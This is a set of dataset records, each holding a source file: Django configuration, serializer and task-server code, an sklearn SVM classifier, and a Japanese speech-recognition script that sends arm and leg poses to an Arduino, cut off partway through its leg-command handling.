+{"seq_id": "636551162", "text": "import os\n\nfrom setuptools import setup\n\ninstall_requires = []\n\nREADME_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README')\n\ndescription = 'Django specific cookie implementation compliant with Dutch law, use at your own risk.'\n\nif os.path.exists(README_PATH):\n long_description = open(README_PATH).read()\nelse:\n long_description = description\n\npackages, data_files = [], []\nroot_dir = os.path.dirname(__file__)\nif root_dir:\n os.chdir(root_dir)\n\nfor dirpath, dirnames, filenames in os.walk('cookie_law'):\n # Ignore dirnames that start with '.'\n for i, dirname in enumerate(dirnames):\n if dirname.startswith('.'): del dirnames[i]\n if '__init__.py' in filenames:\n pkg = dirpath.replace(os.path.sep, '.')\n if os.path.altsep:\n pkg = pkg.replace(os.path.altsep, '.')\n packages.append(pkg)\n elif filenames:\n prefix = dirpath[11:] # Strip \"cookie_law/\"\n for f in filenames:\n data_files.append(os.path.join(prefix, f))\n\n\n\nsetup(\n name='django-cookie-law-nl',\n version='0.2.1',\n install_requires=install_requires,\n include_package_data=True,\n description=description,\n long_description=long_description,\n author='Wouter Lansu',\n author_email='wfrlansu@gmail.com',\n url='https://bitbucket.org/getlogic/lib_django_cookie_law',\n packages=packages,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: BSD License\",\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Intended Audience :: Developers\",\n ],\n)\n", "sub_path": "pypi_install_script/django-cookie-law-nl-0.2.1.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "193820270", "text": "# \turls.py\n# \tCopyright (C) 2012 David Yamnitsky\n# \t\n# \tPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation \n# \tfiles (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, \n# \tmodify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the \n# \tSoftware is furnished to do so, subject to the following conditions:\n# \t\n# \tThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n# \t\n# \tTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE \n# \tWARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS \n# \tOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR \n# \tOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nfrom django.http import HttpResponse\nfrom django.conf.urls import patterns, url, include\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nimport settings\n\nhandler500 = 'home.views.handler500'\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^admin/', include(admin.site.urls)),\n)\n\nurlpatterns = patterns('',\n\turl(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\turl(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEVELOPMENT:\n\turlpatterns += staticfiles_urlpatterns()\n\turlpatterns += patterns('',\n\t\turl(r'^media/(?P.*)$', 'django.views.static.serve', {\n\t\t'document_root': settings.MEDIA_ROOT,\n\t\t}),\n\t)\n\t\nurlpatterns += patterns('',\n\t(r'^robots\\.txt$', lambda request: HttpResponse(\"User-agent: *\\nDisallow: \", mimetype=\"text/plain\")),\n\t(r'^favicon.ico$', 'django.views.generic.simple.redirect_to', \n\t\t{'url': settings.STATIC_URL + 'shared/images/favicon.ico'}),\n)\n\nurlpatterns += patterns('',\n\t(r'^', include('home.urls')),\n\t(r'^search/', include('haystack.urls')),\n)\n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2169, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.conf.urls.patterns", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 33, 
"usage_type": "name"}, {"api_name": "settings.DEVELOPMENT", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.contrib.staticfiles.urls.staticfiles_urlpatterns", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.patterns", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "settings.MEDIA_ROOT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.urls.patterns", "line_number": 44, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "settings.STATIC_URL", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.conf.urls.patterns", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "401488339", "text": "from django.test import TestCase\nfrom django.contrib.auth.models import Group, AnonymousUser\nimport peeringdb_server.models as models\nimport django_namespace_perms as nsp\n\n\nclass ClientCase(TestCase):\n @classmethod\n def setUpTestData(cls):\n # create user and guest group\n\n guest_group = Group.objects.create(name=\"guest\")\n user_group = Group.objects.create(name=\"user\")\n\n cls.guest_user = models.User.objects.create_user(\n \"guest\", \"guest@localhost\", \"guest\")\n guest_group.user_set.add(cls.guest_user)\n\n nsp.models.GroupPermission.objects.create(\n group=guest_group, namespace=\"peeringdb.organization\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=user_group, namespace=\"peeringdb.organization\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=user_group,\n namespace=\"peeringdb.organization.*.network.*.poc_set.users\",\n permissions=0x01)\n\n nsp.models.GroupPermission.objects.create(\n group=guest_group,\n namespace=\"peeringdb.organization.*.network.*.poc_set.public\",\n permissions=0x01)\n", "sub_path": "tests/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.test.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.create", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 13, "usage_type": "name"}, {"api_name": "peeringdb_server.models.User.objects.create_user", "line_number": 15, "usage_type": "call"}, {"api_name": "peeringdb_server.models.User", "line_number": 15, "usage_type": "attribute"}, {"api_name": "peeringdb_server.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django_namespace_perms.models.GroupPermission.objects.create", "line_number": 32, "usage_type": "call"}, {"api_name": "django_namespace_perms.models", "line_number": 32, "usage_type": "attribute"}]}
+{"seq_id": "187384124", "text": "from sklearn import svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import cross_val_score\nfrom mlxtend.evaluate import bias_variance_decomp\nfrom sklearn import metrics\nimport pandas as pd\nimport os\n\nheadings = ['Hour 0', 'Hour 1', 'Hour 2', 'Hour 3', 'Hour 4', 'Hour 5', 'Hour 6', 'Hour 7', 'Hour 8', 'Hour 9',\n 'Hour 10', 'Hour 11', 'Hour 12', 'Hour 13', 'Hour 14', 'Hour 15', 'Hour 16', 'Hour 17', 'Hour 18',\n 'Hour 19', 'Hour 20', 'Hour 21', 'Hour 22', 'Hour 23', 'Label']\n\n# Importing the training/testing txt dataset using pandas, with custom headings\ntraining_set = pd.read_csv(\"TrainingData.txt\", sep=',', names=headings)\nheadings.pop()\ntesting_set = pd.read_csv(\"TestingData.txt\", sep=',', names=headings)\n\n# Display datasets\nprint(\"-------- Displaying training data set --------\")\nprint(training_set.head())\nprint(training_set.tail())\n\nprint(\"\\n-------- Displaying testing data set --------\")\nprint(testing_set.head())\nprint(testing_set.tail())\n\n# grab the 5000 0's or 1's columns to train on\nY = training_set['Label']\n\n# grab all hour columns\nX = training_set[\n ['Hour 0', 'Hour 1', 'Hour 2', 'Hour 3', 'Hour 4', 'Hour 5', 'Hour 6', 'Hour 7', 'Hour 8', 'Hour 9', 'Hour 10',\n 'Hour 11', 'Hour 12', 'Hour 13', 'Hour 14', 'Hour 15', 'Hour 16', 'Hour 17', 'Hour 18', 'Hour 19', 'Hour 20',\n 'Hour 21', 'Hour 22', 'Hour 23']]\n\n# Uncomment these two lines to calculate an estimated mse, bias and variance\n# data = training_set.values\n# X, Y = data[:, :-1], data[:, -1]\n\n# Split the training set 70% testing / 30% training, and randomise data selected\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=0)\n\n# Create a class linear svm classifier\nclassifier = svm.SVC(kernel='linear', C=1, random_state=42)\n\n# Train the classifier\nclassifier.fit(X_train, Y_train)\n\n# Perform cross validation to avoid bias\nscores = cross_val_score(classifier, X, Y, cv=5)\nprint(\"\\nCross Validation Scores: \", scores)\nprint(\"%0.2f accuracy with a standard deviation of %0.2f\" % (scores.mean(), scores.std()))\n\n# Uncomment these lines to estimate bias and variance\n# mse, bias, var = bias_variance_decomp(classifier, X_train, Y_train, X_test, Y_test, loss='mse', num_rounds=200, random_seed=1)\n# # summarize results\n# print('MSE: %.3f' % mse)\n# print('Bias: %.3f' % bias)\n# print('Variance: %.3f' % var)\n\n# Grab predicted results\nY_predicted = classifier.predict(X_test)\n\n# Print how accurate the model is\nprint(\"\\nAccuracy: \", metrics.accuracy_score(Y_test, Y_predicted))\n# Print some analysis metrics\nprint(\"\\nconfusion matrix: \\n\", confusion_matrix(Y_test, Y_predicted))\nprint(\"\\nreport: \\n\", classification_report(Y_test, Y_predicted))\n\n# Use trained classifier on the testing set (100 unlabelled curves)\nprediction_results = classifier.predict(testing_set)\n\n# Print the prediction results\nprint(\"\\nPredicted Labels: \", prediction_results)\n\n# Output a TestingResults.txt file\nos.remove(\"TestingResults.txt\")\ntesting_set[\"Label\"] = prediction_results\ntesting_set.to_csv('TestingResults.txt', header=None, index=None, sep=',', mode='a')\n\n# Display classified results datasets\ntesting_results = pd.read_csv(\"TestingResults.txt\", sep=',', header=None)\nprint(\"\\n -------- Displaying training data set 
--------\")\nprint(testing_results.head())\nprint(testing_results.tail())\nprint(testing_results.shape)\n", "sub_path": "Python Project/SVMClassifier.py", "file_name": "SVMClassifier.py", "file_ext": "py", "file_size_in_byte": 3463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 45, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 66, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 69, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 83, "usage_type": "call"}]}
+{"seq_id": "552643112", "text": "from rest_framework.serializers import(\n HyperlinkedIdentityField,\n ModelSerializer,\n RelatedField,\n CharField,\n ImageField,\n SerializerMethodField\n)\n\nfrom blogs.models import Post\nfrom comments.models import Comment\nfrom comments.api.serializers import CommentSerializer\n\n\nclass PostDetailSerializer(ModelSerializer):\n username = CharField(source='author.username', read_only=True)\n author_image = ImageField(\n source='author.profile.image', read_only=True)\n comments = SerializerMethodField()\n\n class Meta:\n model = Post\n fields = '__all__'\n\n def get_comments(self, obj):\n c_qs = Comment.objects.filter_by_instance(obj)\n comments = CommentSerializer(c_qs, many=True).data\n return comments\n", "sub_path": "blogs/api/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.serializers.CharField", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.serializers.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "comments.models", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.serializers.SerializerMethodField", "line_number": 19, "usage_type": "call"}, {"api_name": "blogs.models.Post", "line_number": 22, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter_by_instance", "line_number": 26, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 26, "usage_type": "name"}, {"api_name": "comments.models", "line_number": 27, "usage_type": "name"}, {"api_name": "comments.api.serializers.CommentSerializer", "line_number": 27, "usage_type": "call"}, {"api_name": "comments.models", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "370147312", "text": "import logging\nimport socketserver\nimport multiprocessing\n\nfrom .helpers import load_task\nfrom . import worker\nfrom . import helpers\nimport django\n\nlog = logging.getLogger(__name__)\n\n\nDcommands = {}\n\n\nclass Pool(object):\n def __init__(self):\n self.queue = multiprocessing.Queue()\n self.worker = multiprocessing.Process(target=worker.target, args=(self.queue,))\n\n\nclass TaskSocketServer(socketserver.BaseRequestHandler):\n DEFAULT_POOL = 'default'\n # pools holds a mapping from pool names to process objects\n pools = {}\n\n def handle(self):\n try:\n data = self.request.recv(5000).strip()\n if data in Dcommands.keys():\n log.info('Got command: \"{}\"'.format(data))\n try:\n worker_response = Dcommands[data]()\n response = (True, worker_response.encode(),)\n self.request.send(str(response).encode())\n except Exception as e:\n log.exception(\"command failed\")\n response = (False, \"TaskServer Command: {}\".format(e).encode(),)\n self.request.send(str(response).encode())\n else:\n # assume a serialized task\n log.info('Got a task')\n try:\n task_id = int(data.decode())\n \n # Connection are closed by tasks, force it to reconnect\n django.db.connections.close_all()\n queued_task = load_task(task_id=task_id)\n \n # Ensure pool got a worker processing it\n pool_name = queued_task.pool or self.DEFAULT_POOL\n pool = self.pools.get(pool_name)\n if pool is None or not pool.worker.is_alive():\n # Spawn new pool\n log.info('Spawning new pool: {}'.format(pool_name))\n self.pools[pool_name] = Pool()\n self.pools[pool_name].worker.start()\n\n task = helpers.unpack(queued_task.pickled_task)\n self.pools[pool_name].queue.put(task)\n\n response = (True, \"sent\")\n self.request.send(str(response).encode())\n except Exception as e:\n log.exception(\"failed to queue task\")\n response = (False, \"TaskServer Put: {}\".format(e).encode(),)\n self.request.send(str(response).encode())\n\n except OSError as e:\n # in case of network error, just log\n log.exception(\"network error\")\n\n def finish(self):\n for pool in self.pools.values():\n pool.queue.put(None)\n", "sub_path": "django_leek/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 18, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 19, "usage_type": "call"}, {"api_name": "socketserver.BaseRequestHandler", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.db.connections.close_all", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db", "line_number": 47, "usage_type": "attribute"}, {"api_name": "helpers.load_task", "line_number": 48, "usage_type": "call"}, {"api_name": "helpers.unpack", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "487755035", "text": "#coding:utf-8\n\n# Send text commands to the Arduino over a serial connection.\n# For some reason the serial monitor sometimes has to be opened once first.\n\n# Log of speech-recognition error patterns\n# for the command \"右手上げないで\" (don't raise the right arm):\n# 右てあげないで -> nothing\n# 見て 手上げないで -> both arms up\n# 聞いてあげないで -> nothing\n# 手を挙げないで -> nothing\n# 携帯を上に上げないで\n# 上に上げないで\n\nimport sys  # for debugging\n\nimport serial  # the package is named pyserial, but it is imported as serial\n\nimport speech_recognition as sr\n\n\ndef python2arduino(text):\n    with serial.Serial('/dev/ttyACM0', 9600, timeout=1) as ser:\n        # while True:\n        # flag=bytes(input(),'utf-8')\n        # flag = input()\n        # flag += '\\0'\n        flag = bytes(\"{}\\0\".format(text), 'utf-8')\n        # flag=bytes('test', 'utf-8')\n        # flag=\"test\"\n\n        # Text has to be converted to a byte string before it is written to\n        # the serial port; strings coming from input() are utf-8.\n\n        # ser.write(flag.encode('utf-8'))\n        ser.write(flag)\n        print(flag)\n\n        # serial communication: send\n\n        # if(flag==bytes('a','utf-8')):\n        #     break\n\n        # line = ser.readline()  # read up to the line terminator '\\n'\n        # print(line)\n        # str=ser.read(100)\n        # print(str.decode('utf-8'), end='\\n')\n        # sys.stdout.buffer(str)\n        # ser.close()\n\n\ndef voice2text():\n    \"\"\"\n    https://futurismo.biz/speech-recognition-with-python/\n    \"\"\"\n\n    r = sr.Recognizer()\n    mic = sr.Microphone(sample_rate=44100)\n\n    with mic as source:\n        r.adjust_for_ambient_noise(source)\n        audio = r.listen(source)\n\n    text = r.recognize_google(audio, language='ja-JP')\n    print(text)\n    return text\n\n\ndef text2coordinate(text):\n    \"\"\"\n    Each *_compare value:\n    initial value: -1\n    raising an arm / pulling a leg back: 1\n    lowering an arm / putting a leg forward: 0\n    \"\"\"\n\n    if \"恥\" in text or \"やだ\" in text or \"ヤダ\" in text or \"嫌\" in text or \"いや\" in text or \"おかしい\" in text:\n        return \"07,\"\n    elif \"こんにちは\" in text or \"あいさつ\" in text or \"挨拶\" in text or \"印刷\" in text:\n        return \"05,\"\n    elif \"自己紹介\" in text or \"名前\" in text:\n        return \"08,\"\n    elif \"準備\" in text:\n        return \"99,\"\n    elif \"ダンス\" in text or \"踊\" in text or \"おどって\" in text:\n        return \"10,\"\n    elif \"紹介\" in text or \"名前\" in text:\n        return \"08,\"\n\n    right_arm_compare = -1\n    left_arm_compare = -1\n    right_leg_compare = -1\n    left_leg_compare = -1\n\n    if \"終\" in text:\n        return \"-1\"\n\n    # arms\n    if \"両手\" in text or \"両腕\" in text or \"料理\" in text:\n        if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        else:\n            print(\"Input mentions both arms but matched no pattern.\")\n\n    elif (\"右手\" in text and \"左手\" not in text) or (\"右腕\" in text and \"左腕\" not in text) or \"赤\" in text or \"カイロ\" in text:\n        if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n        elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n\n    elif (\"左手\" in text and \"右手\" not in text) or (\"左腕\" in text and \"右腕\" not in text) or \"白\" in text:\n        if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n            print(\"mode: left arm down\")\n            left_arm_compare = 0\n        elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n            print(\"mode: left arm up\")\n            left_arm_compare = 1\n        elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n            print(\"mode: left arm up\")\n            left_arm_compare = 1\n        elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n            print(\"mode: left arm down\")\n            left_arm_compare = 0\n\n    elif right_arm_compare == -1 and (\"右手\" in text or \"右腕\" in text):\n        if \"右手を上げない\" in text or \"右手を挙げない\" in text or \"右手をあげない\" in text or \"右手を揚げない\" in text or \"右腕を上げない\" in text or \"右腕を挙げない\" in text or \"右腕をあげない\" in text or \"右腕を揚げない\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n        elif \"右手を下げない\" in text or \"右手を降ろさない\" in text or \"右手をおろさない\" in text or \"右手をさげない\" in text or \"右腕を下げない\" in text or \"右腕を降ろさない\" in text or \"右腕をおろさない\" in text or \"右腕をさげない\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"右手を上\" in text or \"右手を挙\" in text or \"右手をあげ\" in text or \"右腕を上\" in text or \"右腕を挙\" in text or \"右腕をあげ\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"右手を下\" in text or \"右手を降\" in text or \"右手をおろ\" in text or \"右手をさげ\" in text or \"右腕を下\" in text or \"右腕を降\" in text or \"右腕をおろ\" in text or \"右腕をさげ\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n\n    elif left_arm_compare == -1 and (\"左手\" in text or \"左腕\" in text):\n        if \"左手を上げない\" in text or \"左手を挙げない\" in text or \"左手をあげない\" in text or \"左手を揚げない\" in text or \"左腕を上げない\" in text or \"左腕を挙げない\" in text or \"左腕をあげない\" in text or \"左腕を揚げない\" in text:\n            print(\"mode: left arm down\")\n            left_arm_compare = 0\n        elif \"左手を下げない\" in text or \"左手を降ろさない\" in text or \"左手をおろさない\" in text or \"左手をさげない\" in text or \"左腕を下げない\" in text or \"左腕を降ろさない\" in text or \"左腕をおろさない\" in text or \"左腕をさげない\" in text:\n            print(\"mode: left arm up\")\n            left_arm_compare = 1\n        elif \"左手を上\" in text or \"左手を挙\" in text or \"左手をあげ\" in text or \"左腕を上\" in text or \"左腕を挙\" in text or \"左腕をあげ\" in text:\n            print(\"mode: left arm up\")\n            left_arm_compare = 1\n        elif \"左手を下\" in text or \"左手を降\" in text or \"左手をおろ\" in text or \"左手をさげ\" in text or \"左腕を下\" in text or \"左腕を降\" in text or \"左腕をおろ\" in text or \"左腕をさげ\" in text:\n            print(\"mode: left arm down\")\n            left_arm_compare = 0\n\n    elif right_arm_compare == -1 and left_arm_compare == -1 and (\"手\" in text or \"腕\" in text):\n        if \"上げない\" in text or \"挙げない\" in text or \"あげない\" in text or \"揚げない\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"下げない\" in text or \"降ろさない\" in text or \"おろさない\" in text or \"さげない\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"上\" in text or \"挙\" in text or \"あげ\" in text or \"揚げ\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"下\" in text or \"降\" in text or \"おろ\" in text or \"さげ\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n\n    elif right_arm_compare == -1 and left_arm_compare == -1:\n        print(\"other\")\n        if \"右\" in text and \"空\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"左\" in text and \"空\" in text:\n            print(\"mode: left arm up\")\n            left_arm_compare = 1\n        elif \"空\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"ヒーロー\" in text and \"揚げない\" in text:\n            print(\"mode: left arm (white) down\")\n            left_arm_compare = 0\n        elif \"それないで\" in text:\n            print(\"mode: left arm (white) up\")\n            left_arm_compare = 1\n        elif \"上げない\" in text or \"揚げない\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"下げない\" in text or \"降ろさない\" in text or \"さげない\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"上\" in text or \"揚げ\" in text or \"あげ\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"下\" in text or \"降\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"ゆであげて\" in text or \"見ててあげない\" in text or \"見れてあげて\" in text or \"入れてあげて\" in text:\n            print(\"mode: right arm up\")\n            right_arm_compare = 1\n        elif \"ゆであげないで\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n        elif \"ゲーム\" in text and \"あげない\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n        elif \"見てて\" in text and \"あげて\" in text:\n            print(\"mode: right arm down\")\n            right_arm_compare = 0\n        elif \"あげない\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"あげ\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"おろさない\" in text or \"さげない\" in text:\n            print(\"mode: both arms up\")\n            right_arm_compare = 1\n            left_arm_compare = 1\n        elif \"おろ\" in text or \"さげ\" in text:\n            print(\"mode: both arms down\")\n            right_arm_compare = 0\n            left_arm_compare = 0\n        elif \"飛騨牛\" in text or \"やり手\" in text:\n            if \"上げない\" in text or \"挙\" in text:\n                print(\"mode: left arm down\")\n                left_arm_compare = 0\n            elif \"下げない\" in text or \"降ろさない\" in text:\n                print(\"mode: left arm up\")\n                left_arm_compare = 1\n            elif \"上\" in text or \"挙\" in text:\n                print(\"mode: left arm up\")\n                left_arm_compare = 1\n            elif \"下\" in text or \"降\" in text:\n                print(\"mode: left arm down\")\n                left_arm_compare = 0\n\n    # legs\n    if \"両足\" in text:\n        if \"出さない\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n        elif \"戻さない\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            left_leg_compare = 1\n        elif \"前\" in text:\n            print(\"mode: both legs forward\")\n            right_leg_compare = 0\n            left_leg_compare = 0\n        elif \"後\" in text:\n            print(\"mode: both legs back\")\n            right_leg_compare = 1\n            